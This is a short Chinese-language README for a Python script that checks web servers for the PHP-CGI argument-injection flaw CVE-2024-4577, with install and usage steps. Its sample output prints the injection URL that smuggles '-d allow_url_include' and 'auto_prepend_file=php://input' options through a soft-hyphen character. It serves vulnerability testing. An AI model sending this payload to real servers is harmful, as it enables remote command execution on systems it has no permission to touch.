PHP 的 CGI 模式存在一个严重的安全漏洞,攻击者可以通过操控 URL 参数来运行任意命令。
在运行脚本之前,请确保系统中已安装 Python 3。此外,你需要 requests 库来处理 HTTP 请求。
你可以使用 pip 安装所需的依赖。如果未安装 pip,请按照此处的说明进行操作。
requests 库:pip install requests
要检查目标 URL 是否存在 CVE-2024-4577 漏洞,请按照以下步骤操作:
python3 exploit.py <target>
例如,要测试 URL http://example.com,请运行:
python3 exploit.py http://example.com
脚本将测试提供的目标 URL 是否存在漏洞,并将结果打印到控制台。它将指示是否发现了潜在漏洞,或者是否未检测到漏洞。
(+) Potential vulnerability found at: http://example.com/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input
(-) No vulnerability found at: http://example.com/php-cgi/php-cgi.exe?%ADd+allow_url_include
此漏洞由 Orange Tsai (@orange_8361) 发现。